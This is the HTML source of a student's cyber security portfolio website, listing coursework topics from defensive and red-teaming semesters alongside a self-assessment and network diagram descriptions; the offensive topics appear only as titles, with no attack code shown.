          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
           <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
           <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
           </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#09796064496b6c6c626468677a276d6c7f"><span class="__cf_email__" data-cfemail="e191888ca18384848a8c808f92cf858497">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
          <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
